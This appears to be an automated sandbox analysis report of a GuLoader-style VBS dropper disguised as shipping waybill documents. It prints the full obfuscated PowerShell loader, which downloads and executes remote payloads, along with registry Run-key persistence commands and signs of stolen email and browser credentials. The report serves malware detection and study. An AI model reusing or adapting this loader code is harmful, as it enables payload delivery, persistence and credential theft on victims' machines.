Analysis
-
max time kernel
138s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
-
submitted
04/07/2024, 03:08
General
-
Target
waybill_shipping_documents_original_BL_CI&PL_03_07_2024_00000000_doc.vbs
-
Size
26KB
-
MD5
503813637a43724a817bf18d9f8b6610
-
SHA1
c44800bcab2246b8cea09d9c8e8b56d461a634cc
-
SHA256
027478d4f38530836abfa6819748b88b4b540d0a27090903d697a5d3e555535e
-
SHA512
486ac7e3b46725c0da9f27051d6b657a59746a99d2788ccf971096ab8b920dcb3547acc320ca83d064a639694f992b917705bfb839729ac3473237a12ce2bb4e
-
SSDEEP
384:VBlzV6m2So022lGP9V6+s0flKJpl/5ZrE5HVnS0Re7PIx+5lEPmgww74LKQKhOAp:ZzSR022X/523S0e8xPPm+Tmq5qPtxhgz
Score
10/10
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
-
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
-
Nirsoft 3 IoCs
-
Blocklisted process makes network request 3 IoCs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 4 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
-
Suspicious use of SetThreadContext 5 IoCs
-
Drops file in Program Files directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
-
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 30 IoCs
-
Suspicious behavior: MapViewOfSection 8 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\waybill_shipping_documents_original_BL_CI&PL_03_07_2024_00000000_doc.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Iliocaudal66 glug ekslibrisenes Unstooped Feverweed Regnvaad Autolycus Revsedes fishpotter Identitetsantagelsens tilrettelagt Separationsbevillingens Oratoriers Kunstanmeldelsen Bjergets Erhversevne Groovy Donkeywork Pyrenopeziza Fluefangernes Skakbrikkernes92 Pleasantish indbrnder Bevaringsforeninger Iliocaudal66 glug ekslibrisenes Unstooped Feverweed Regnvaad Autolycus Revsedes fishpotter Identitetsantagelsens tilrettelagt Separationsbevillingens Oratoriers Kunstanmeldelsen Bjergets Erhversevne Groovy Donkeywork Pyrenopeziza Fluefangernes Skakbrikkernes92 Pleasantish indbrnder Bevaringsforeninger';If (${host}.CurrentCulture) {$Reaktionsdrevet++;}Function Livsforsikringer($Pacesetter){$Ascendentens=$Pacesetter.Length-$Reaktionsdrevet;$Lexicographic184='SUBsTRI';$Lexicographic184+='ng';For( $Tootsies82=1;$Tootsies82 -lt $Ascendentens;$Tootsies82+=2){$Iliocaudal66+=$Pacesetter.$Lexicographic184.Invoke( $Tootsies82, $Reaktionsdrevet);}$Iliocaudal66;}function Knucks($Derrik){ & ($Paasttelses) ($Derrik);}$Afbankningers=Livsforsikringer ' MOo z i,l.lTa / 5R.,0 .(BWSi nUd oTw sO N,T .1N0 ..0M;, .W,iMnR6 4P;. xC6T4,;. r.vT:S1E2R1 ..0.)V .G,eVcPk o,/ 2R0s1i0d0 1F0 1 SF iDr eEfPoRx /Q1A2N1 .U0 ';$Cornmonger=Livsforsikringer ' U.s eCrU-.ABg enn t. ';$Feverweed=Livsforsikringer 'ShKtNtNp.s,:,/P/,k i.pHePlS.Sc.oRm,..bVrB/A.SwHe l lA- kcnToAw nL/Ap.kAiA- vFa lIi d aOt i oBn /,t,8.XML b./.m x./.P aAg aOjReRn,sS. aIcDa.> h tSt.pEsD:G/,/AaSs,oUc i a t i aStMrHa.dSiGtFi iumPa r ibaU.,r,o / PEa g aBjTeFn,sH. aGc.aP ';$Semidiapente=Livsforsikringer 'C>U ';$Paasttelses=Livsforsikringer 'DiAeUxu ';$stedfortrderne='Revsedes';$Stinksvamp = Livsforsikringer ',e cChSo. G%Ua p pHd aKt aF%I\FE nFeRr,g i eBr n.eC.sB o r ,& & BeMcSh.o, .tA ';Knucks (Livsforsikringer ' $ g lDo,bDaAlC: DRa nDsIe m u s.iPk.=C(AcSmRdS A/ c. c$.S.tRiDn,k spvTa m pB), ');Knucks (Livsforsikringer '.$Rg,lKoKb aPlS: UCnEs t.o oGpAeGd.=u$,FSe,vDehr w e e,d,.,sBpSlCiStS(H$.S eUmMiUdAi a,p eEn.tTe )N ');Knucks (Livsforsikringer ' [.N,eDt .SS.e,r vTiWc e.PSo i nBtHMTa,nDa.g e r ].: :ASTe c,u r iGt ySP rFoIt.o c.oAlB ,=, [TN e tD.SSWe.cCu r.iFt.y PUr oKtPoKc,oTlETSy p.eR] :,:FT lUs 1D2E ');$Feverweed=$Unstooped[0];$Guruships232= (Livsforsikringer 'D$Sg l,oVbSa l :OBOu m p k iRnDsP3.1.=PN,e,wC-.OAbSjMeGc t .S,yTsUtJe mP.VN.e tC.OW e b C,lHiUeVn t');$Guruships232+=$Dansemusik[1];Knucks ($Guruships232);Knucks (Livsforsikringer 'C$MB,uSm pMk.i n,s,3T1L.,H.e aSdOeOrPs [ $,C,o,rGncmGoFn gSe r ],=.$SADfAb,aIn.k nAi.nFg e r s ');$Preponderating=Livsforsikringer 'T$NB.uTmNp kMiFn sF3O1S.BDSoBwrndl oFa dEF i,l eD(P$ F ecvye rKw e,eOdW,P$ PVl,e a.sgatn t,iUsfhD) ';$Pleasantish=$Dansemusik[0];Knucks (Livsforsikringer 'A$SgRlPo b a l : DSiLa s,t efm,ar= (UT.e.sAt.-,PTa tThN $uPAlBePaRs a.nSt iis,hB). ');while (!$Diastema) {Knucks (Livsforsikringer 'r$DgKlSoMbSaSlS:.F r i s k i.n,e.sTs.eFs =d$.t rIuTeM ') ;Knucks $Preponderating;Knucks (Livsforsikringer ',S tUa rTtU-.SCl,eAe p 4 ');Knucks (Livsforsikringer 'L$,gBlEoObSaSl :BD,iAaCs t,eRm.a = ( T eRsCt -UPSa.t h. $ PTl e,aUsHasnEt iRsAh.)A ') ;Knucks (Livsforsikringer 'L$.g lEo bNaAlE: eWk,sOl i.bbr i.sIeBn.eOs,=T$UgUl oHb.aIlU:.gKlFu.g +N+ %.$OU,nCsUt.oUo.pTe d ..cAo.u.nRto ') ;$Feverweed=$Unstooped[$ekslibrisenes];}$Defector=324114;$Lamelloid=25357;Knucks (Livsforsikringer ' $ gTl,oSbPa lP:Sf iSs.h p o tRtFe rK E= GSeDtB-mC oOnMtAeDn,tD S$ PMl eEaSs,aHn,tEiUs h. ');Knucks (Livsforsikringer 'F$VgdlHo bsa.lS:.MOaGnRq upeTeU = M[.SNymsAtUeBmA. CBo n,vGeor.t.]S: :CF rSorm B aBsUeH6.4HS tFrMi ndg,(.$.fai.s,hkp o,tStbe.rP)F ');Knucks (Livsforsikringer 'V$TgSl o bSaEl,:PS eEpEaArRa,t iIosn sPbPe v iUlMl isnBg e n s =. [sS y s t e m..,T,e xBtm.REFn.cioSd.iNn gE]L:B: A SSCPI I,.,G.eAt,S.tBrRiVnKg (.$hMOa nZq u,e.e ) ');Knucks (Livsforsikringer ' $ gOlDoUbFa lI:.H,uPs hEoSlOd nCi nSgAs b ufd.gVeFt tJe.r sT= $OS.eCpDaIr.a t isoCnAs bKeMv.i,l lIiUn.g eAnLs.. sSu.b sMtFrui nSgC(,$.D,e,fFe cBt o.rF,I$TLBa.mKeDlAl.oci.dG)U ');Knucks $Husholdningsbudgetters;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Energierne.Bor && echo t"3⤵
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Iliocaudal66 glug ekslibrisenes Unstooped Feverweed Regnvaad Autolycus Revsedes fishpotter Identitetsantagelsens tilrettelagt Separationsbevillingens Oratoriers Kunstanmeldelsen Bjergets Erhversevne Groovy Donkeywork Pyrenopeziza Fluefangernes Skakbrikkernes92 Pleasantish indbrnder Bevaringsforeninger Iliocaudal66 glug ekslibrisenes Unstooped Feverweed Regnvaad Autolycus Revsedes fishpotter Identitetsantagelsens tilrettelagt Separationsbevillingens Oratoriers Kunstanmeldelsen Bjergets Erhversevne Groovy Donkeywork Pyrenopeziza Fluefangernes Skakbrikkernes92 Pleasantish indbrnder Bevaringsforeninger';If (${host}.CurrentCulture) {$Reaktionsdrevet++;}Function Livsforsikringer($Pacesetter){$Ascendentens=$Pacesetter.Length-$Reaktionsdrevet;$Lexicographic184='SUBsTRI';$Lexicographic184+='ng';For( $Tootsies82=1;$Tootsies82 -lt $Ascendentens;$Tootsies82+=2){$Iliocaudal66+=$Pacesetter.$Lexicographic184.Invoke( $Tootsies82, $Reaktionsdrevet);}$Iliocaudal66;}function Knucks($Derrik){ & ($Paasttelses) ($Derrik);}$Afbankningers=Livsforsikringer ' MOo z i,l.lTa / 5R.,0 .(BWSi nUd oTw sO N,T .1N0 ..0M;, .W,iMnR6 4P;. xC6T4,;. r.vT:S1E2R1 ..0.)V .G,eVcPk o,/ 2R0s1i0d0 1F0 1 SF iDr eEfPoRx /Q1A2N1 .U0 ';$Cornmonger=Livsforsikringer ' U.s eCrU-.ABg enn t. ';$Feverweed=Livsforsikringer 'ShKtNtNp.s,:,/P/,k i.pHePlS.Sc.oRm,..bVrB/A.SwHe l lA- kcnToAw nL/Ap.kAiA- vFa lIi d aOt i oBn /,t,8.XML b./.m x./.P aAg aOjReRn,sS. aIcDa.> h tSt.pEsD:G/,/AaSs,oUc i a t i aStMrHa.dSiGtFi iumPa r ibaU.,r,o / PEa g aBjTeFn,sH. aGc.aP ';$Semidiapente=Livsforsikringer 'C>U ';$Paasttelses=Livsforsikringer 'DiAeUxu ';$stedfortrderne='Revsedes';$Stinksvamp = Livsforsikringer ',e cChSo. G%Ua p pHd aKt aF%I\FE nFeRr,g i eBr n.eC.sB o r ,& & BeMcSh.o, .tA ';Knucks (Livsforsikringer ' $ g lDo,bDaAlC: DRa nDsIe m u s.iPk.=C(AcSmRdS A/ c. c$.S.tRiDn,k spvTa m pB), ');Knucks (Livsforsikringer '.$Rg,lKoKb aPlS: UCnEs t.o oGpAeGd.=u$,FSe,vDehr w e e,d,.,sBpSlCiStS(H$.S eUmMiUdAi a,p eEn.tTe )N ');Knucks (Livsforsikringer ' [.N,eDt .SS.e,r vTiWc e.PSo i nBtHMTa,nDa.g e r ].: :ASTe c,u r iGt ySP rFoIt.o c.oAlB ,=, [TN e tD.SSWe.cCu r.iFt.y PUr oKtPoKc,oTlETSy p.eR] :,:FT lUs 1D2E ');$Feverweed=$Unstooped[0];$Guruships232= (Livsforsikringer 'D$Sg l,oVbSa l :OBOu m p k iRnDsP3.1.=PN,e,wC-.OAbSjMeGc t .S,yTsUtJe mP.VN.e tC.OW e b C,lHiUeVn t');$Guruships232+=$Dansemusik[1];Knucks ($Guruships232);Knucks (Livsforsikringer 'C$MB,uSm pMk.i n,s,3T1L.,H.e aSdOeOrPs [ $,C,o,rGncmGoFn gSe r ],=.$SADfAb,aIn.k nAi.nFg e r s ');$Preponderating=Livsforsikringer 'T$NB.uTmNp kMiFn sF3O1S.BDSoBwrndl oFa dEF i,l eD(P$ F ecvye rKw e,eOdW,P$ PVl,e a.sgatn t,iUsfhD) ';$Pleasantish=$Dansemusik[0];Knucks (Livsforsikringer 'A$SgRlPo b a l : DSiLa s,t efm,ar= (UT.e.sAt.-,PTa tThN $uPAlBePaRs a.nSt iis,hB). ');while (!$Diastema) {Knucks (Livsforsikringer 'r$DgKlSoMbSaSlS:.F r i s k i.n,e.sTs.eFs =d$.t rIuTeM ') ;Knucks $Preponderating;Knucks (Livsforsikringer ',S tUa rTtU-.SCl,eAe p 4 ');Knucks (Livsforsikringer 'L$,gBlEoObSaSl :BD,iAaCs t,eRm.a = ( T eRsCt -UPSa.t h. $ PTl e,aUsHasnEt iRsAh.)A ') ;Knucks (Livsforsikringer 'L$.g lEo bNaAlE: eWk,sOl i.bbr i.sIeBn.eOs,=T$UgUl oHb.aIlU:.gKlFu.g +N+ %.$OU,nCsUt.oUo.pTe d ..cAo.u.nRto ') ;$Feverweed=$Unstooped[$ekslibrisenes];}$Defector=324114;$Lamelloid=25357;Knucks (Livsforsikringer ' $ gTl,oSbPa lP:Sf iSs.h p o tRtFe rK E= GSeDtB-mC oOnMtAeDn,tD S$ PMl eEaSs,aHn,tEiUs h. ');Knucks (Livsforsikringer 'F$VgdlHo bsa.lS:.MOaGnRq upeTeU = M[.SNymsAtUeBmA. CBo n,vGeor.t.]S: :CF rSorm B aBsUeH6.4HS tFrMi ndg,(.$.fai.s,hkp o,tStbe.rP)F ');Knucks (Livsforsikringer 'V$TgSl o bSaEl,:PS eEpEaArRa,t iIosn sPbPe v iUlMl isnBg e n s =. [sS y s t e m..,T,e xBtm.REFn.cioSd.iNn gE]L:B: A SSCPI I,.,G.eAt,S.tBrRiVnKg (.$hMOa nZq u,e.e ) ');Knucks (Livsforsikringer ' $ gOlDoUbFa lI:.H,uPs hEoSlOd nCi nSgAs b ufd.gVeFt tJe.r sT= $OS.eCpDaIr.a t isoCnAs bKeMv.i,l lIiUn.g eAnLs.. sSu.b sMtFrui nSgC(,$.D,e,fFe cBt o.rF,I$TLBa.mKeDlAl.oci.dG)U ');Knucks $Husholdningsbudgetters;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Energierne.Bor && echo t"4⤵
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Trancetilstanden" /t REG_EXPAND_SZ /d "%Steren% -w 1 $Fdevaregrossister=(Get-ItemProperty -Path 'HKCU:\Opbygningsfases\').Assertorially;%Steren% ($Fdevaregrossister)"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Trancetilstanden" /t REG_EXPAND_SZ /d "%Steren% -w 1 $Fdevaregrossister=(Get-ItemProperty -Path 'HKCU:\Opbygningsfases\').Assertorially;%Steren% ($Fdevaregrossister)"6⤵
- Adds Run key to start application
- Modifies registry key
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Poodle.vbs"5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte';$Stileemnets = 1;Function Alert($Catoptrical){$Dispropriate=$Catoptrical.Length-$Stileemnets;$Cohesions='SUBSTRIN';$Cohesions+='G';For( $Kaliumklorider=1;$Kaliumklorider -lt $Dispropriate;$Kaliumklorider+=2){$Commixed+=$Catoptrical.$Cohesions.Invoke( $Kaliumklorider, $Stileemnets);}$Commixed;}function Xylografien($Disharmoner){ . ($Dragemanden) ($Disharmoner);}$Cigale=Alert 'PMSomzUiRlBlOaA/B5.. 0S b(TW iSnAdVoUwCsG .NrT 1 0D.S0 ;P .WsiOnX6U4N;, .x 6L4C; r,vF:.1 2T1 . 0B)O BG,ePc k o,/ 2U0 1T0u0S1A0N1. SF.i.rme f,o xD/ 1M2F1 .,0 ';$belieffulness=Alert ' U sHeFr.-TAtg eTnGtP ';$Bestemmelsesstedets=Alert ' hKt.t pHs : / / e.v,oMl.uBxGcFoTnWt.aEbSi.l iFd aEd e .,cKo ml. b rO/.x l oKaAd /FRPuHm nSe r . xot pT ';$Voldtog=Alert 'K>N ';$Dragemanden=Alert ' iGecx, ';$Sydvestenvinds='Afdelingsingenirs183';$Anglisterne = Alert ' eAcAh o %QaVpSpEdKa tGaP%o\BbCeElSe m nPo.iSdBeMaI.OF o,s, ,& & PeDc hPod t ';Xylografien (Alert 'D$ gKl oTbBa lS: FTo r r.eBtAn i,nUg sIocmIr,aUaFdBefr =B( c.mDd. / cB ,$AA nCg l,itsKt e,r nDe ) ');Xylografien (Alert '.$bg.lCo,b aKlQ:HBJe,rBtHo.lKo nDi.a =G$ B e s t,e mKm eKlSs eCsHsSt eOd,e tBs,. sUpSlNi tP(R$,V o.l d tEo gU)R ');Xylografien (Alert ' [ NOe tZ.LS eIr.vBiAc.eSP oCi,n tcMoa.n.aagIeer ]P:D:,S ePc u.rSiot.y PfrPo tFo c,o lB C=, B[HN e t..ESBe cSuSrFiStkyBPjr,o,t.o,cRo lUT y.p,eA] : :DT.lFsM1 2. ');$Bestemmelsesstedets=$Bertolonia[0];$Ghoulishness= (Alert 'S$LgPlUoRb.a.l.:AS.kMo v hSyPt t eSn 9.8.= NUe.wR- O.bAjTeBc t, S y sBt,ePm . NAeTt . WLe b C l.i eKnPt');$Ghoulishness+=$Forretningsomraader[1];Xylografien ($Ghoulishness);Xylografien (Alert '.$ STk o v.hBy t.tKe nS9.8U..HFeHa d ePrBsG[G$DbCe,l.iSe fMf,uLl nHeAsHs.].= $ Cpi g a.lSeS ');$Jacuaru=Alert 'S$ S,kBo vTh,yFt.t eUn,9 8F.UD,o.wfnNl.o,afdTF.iRl,e (C$RBTeAsVtLe m,mTeDl s e sosst eKdBe.tBs ,D$KC iTtTrmoUnNsAo m,m e,r fGuSgElMe n sI). ';$Citronsommerfuglens=$Forretningsomraader[0];Xylografien (Alert ' $SgUl,o b a.l : L,aTv.eInGdUe lSeTn =B(MT e sAtO-IPVa.tIhB B$FCBiPtSr oHngsBoSmIm.ePrPfLuFg.l.ePn sG) ');while (!$Lavendelen) {Xylografien (Alert ' $tg l,oCb,aOl :,DSuPbbl,eJe.r n eR= $NtDrSureF ') ;Xylografien $Jacuaru;Xylografien (Alert ' S tPaMrKtN- SBl e e ps ,4. ');Xylografien (Alert 'C$Dg.l oEb a lH: LPaDv eTn dieGl eOnd=P(.TOe sDtP- P.aStph B$FCFi t rDo.nUs,okmCm ePrPfYugg lAe,n sS)U ') ;Xylografien (Alert 'I$Gg.lboNbMa l :aAHn,dHr.oEcKrHa tOi.cO=A$Sg l oSb a lJ:kSCt,iAn ePsD+ +s%U$ BVeUrHtAo,l oDn,i a ..c oHu n tS ') ;$Bestemmelsesstedets=$Bertolonia[$Androcratic];}$Nonapprehensibility=372684;$Phytin=25966;Xylografien (Alert 'F$ gPl oSb a l :kD onr.t.eM1 0 3 R= FGBe tD-,C.oPnItJeLnFt. S$ C i tFr o nDsKoUm mFe r f.uBgul,eKn s ');Xylografien (Alert 'U$ gAl.oPb.aHl :HEGmFaKnscSi,pBaQtBe B=l [DSDyPsStDeSmH. CsoOnTvLeFr t,]N:B:.FSr,o,m,B a s.e,6u4RS.tNrsi,nagA(W$ DRo r t e 1H0 3S), ');Xylografien (Alert 'I$Bg lSoIbNaBl : L,iTeLnPeCcCtmoSmSiPeRsK =. .[SS yVs t,eIm..VTYe x tS. E,n c,o dIi n g ],:.: A,SOCNIPIM.BGAe,t SItHr i n g (,$UE mBa n cPiRp.aBtDeS)A ');Xylografien (Alert ' $ gPl.ombTaVl.:.SPk rov e b.e lSg nSiMn g e nF= $ L i.e,nae cEtPoSmPi eksA.GsCu b,s tCr i.nOgK(T$bNBoBnDaHpPp rPe hSe.n.sdiAb,i lMi tAy.,,$ PHh yVtBiLn )E ');Xylografien $Skrvebelgningen;"6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\belemnoidea.Fos && echo t"7⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte';$Stileemnets = 1;Function Alert($Catoptrical){$Dispropriate=$Catoptrical.Length-$Stileemnets;$Cohesions='SUBSTRIN';$Cohesions+='G';For( $Kaliumklorider=1;$Kaliumklorider -lt $Dispropriate;$Kaliumklorider+=2){$Commixed+=$Catoptrical.$Cohesions.Invoke( $Kaliumklorider, $Stileemnets);}$Commixed;}function Xylografien($Disharmoner){ . ($Dragemanden) ($Disharmoner);}$Cigale=Alert 'PMSomzUiRlBlOaA/B5.. 0S b(TW iSnAdVoUwCsG .NrT 1 0D.S0 ;P .WsiOnX6U4N;, .x 6L4C; r,vF:.1 2T1 . 0B)O BG,ePc k o,/ 2U0 1T0u0S1A0N1. SF.i.rme f,o xD/ 1M2F1 .,0 ';$belieffulness=Alert ' U sHeFr.-TAtg eTnGtP ';$Bestemmelsesstedets=Alert ' hKt.t pHs : / / e.v,oMl.uBxGcFoTnWt.aEbSi.l iFd aEd e .,cKo ml. b rO/.x l oKaAd /FRPuHm nSe r . xot pT ';$Voldtog=Alert 'K>N ';$Dragemanden=Alert ' iGecx, ';$Sydvestenvinds='Afdelingsingenirs183';$Anglisterne = Alert ' eAcAh o %QaVpSpEdKa tGaP%o\BbCeElSe m nPo.iSdBeMaI.OF o,s, ,& & PeDc hPod t ';Xylografien (Alert 'D$ gKl oTbBa lS: FTo r r.eBtAn i,nUg sIocmIr,aUaFdBefr =B( c.mDd. / cB ,$AA nCg l,itsKt e,r nDe ) ');Xylografien (Alert '.$bg.lCo,b aKlQ:HBJe,rBtHo.lKo nDi.a =G$ B e s t,e mKm eKlSs eCsHsSt eOd,e tBs,. sUpSlNi tP(R$,V o.l d tEo gU)R ');Xylografien (Alert ' [ NOe tZ.LS eIr.vBiAc.eSP oCi,n tcMoa.n.aagIeer ]P:D:,S ePc u.rSiot.y PfrPo tFo c,o lB C=, B[HN e t..ESBe cSuSrFiStkyBPjr,o,t.o,cRo lUT y.p,eA] : :DT.lFsM1 2. ');$Bestemmelsesstedets=$Bertolonia[0];$Ghoulishness= (Alert 'S$LgPlUoRb.a.l.:AS.kMo v hSyPt t eSn 9.8.= NUe.wR- O.bAjTeBc t, S y sBt,ePm . NAeTt . WLe b C l.i eKnPt');$Ghoulishness+=$Forretningsomraader[1];Xylografien ($Ghoulishness);Xylografien (Alert '.$ STk o v.hBy t.tKe nS9.8U..HFeHa d ePrBsG[G$DbCe,l.iSe fMf,uLl nHeAsHs.].= $ Cpi g a.lSeS ');$Jacuaru=Alert 'S$ S,kBo vTh,yFt.t eUn,9 8F.UD,o.wfnNl.o,afdTF.iRl,e (C$RBTeAsVtLe m,mTeDl s e sosst eKdBe.tBs ,D$KC iTtTrmoUnNsAo m,m e,r fGuSgElMe n sI). ';$Citronsommerfuglens=$Forretningsomraader[0];Xylografien (Alert ' $SgUl,o b a.l : L,aTv.eInGdUe lSeTn =B(MT e sAtO-IPVa.tIhB B$FCBiPtSr oHngsBoSmIm.ePrPfLuFg.l.ePn sG) ');while (!$Lavendelen) {Xylografien (Alert ' $tg l,oCb,aOl :,DSuPbbl,eJe.r n eR= $NtDrSureF ') ;Xylografien $Jacuaru;Xylografien (Alert ' S tPaMrKtN- SBl e e ps ,4. ');Xylografien (Alert 'C$Dg.l oEb a lH: LPaDv eTn dieGl eOnd=P(.TOe sDtP- P.aStph B$FCFi t rDo.nUs,okmCm ePrPfYugg lAe,n sS)U ') ;Xylografien (Alert 'I$Gg.lboNbMa l :aAHn,dHr.oEcKrHa tOi.cO=A$Sg l oSb a lJ:kSCt,iAn ePsD+ +s%U$ BVeUrHtAo,l oDn,i a ..c oHu n tS ') ;$Bestemmelsesstedets=$Bertolonia[$Androcratic];}$Nonapprehensibility=372684;$Phytin=25966;Xylografien (Alert 'F$ gPl oSb a l :kD onr.t.eM1 0 3 R= FGBe tD-,C.oPnItJeLnFt. S$ C i tFr o nDsKoUm mFe r f.uBgul,eKn s ');Xylografien (Alert 'U$ gAl.oPb.aHl :HEGmFaKnscSi,pBaQtBe B=l [DSDyPsStDeSmH. CsoOnTvLeFr t,]N:B:.FSr,o,m,B a s.e,6u4RS.tNrsi,nagA(W$ DRo r t e 1H0 3S), ');Xylografien (Alert 'I$Bg lSoIbNaBl : L,iTeLnPeCcCtmoSmSiPeRsK =. .[SS yVs t,eIm..VTYe x tS. E,n c,o dIi n g ],:.: A,SOCNIPIM.BGAe,t SItHr i n g (,$UE mBa n cPiRp.aBtDeS)A ');Xylografien (Alert ' $ gPl.ombTaVl.:.SPk rov e b.e lSg nSiMn g e nF= $ L i.e,nae cEtPoSmPi eksA.GsCu b,s tCr i.nOgK(T$bNBoBnDaHpPp rPe hSe.n.sdiAb,i lMi tAy.,,$ PHh yVtBiLn )E ');Xylografien $Skrvebelgningen;"7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\belemnoidea.Fos && echo t"8⤵
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"8⤵
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"8⤵
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"8⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Rollingerne" /t REG_EXPAND_SZ /d "%Montuvio% -w 1 $Lkapsler=(Get-ItemProperty -Path 'HKCU:\overdeferential\').retoucheres;%Montuvio% ($Lkapsler)"9⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Rollingerne" /t REG_EXPAND_SZ /d "%Montuvio% -w 1 $Lkapsler=(Get-ItemProperty -Path 'HKCU:\overdeferential\').retoucheres;%Montuvio% ($Lkapsler)"10⤵
- Adds Run key to start application
- Modifies registry key
-
-
-
-
-
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\czqcolh"5⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mtdmpdsryr"5⤵
- Accesses Microsoft Outlook accounts
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\xvifpwdkmzsyph"5⤵
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\xvifpwdkmzsyph"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
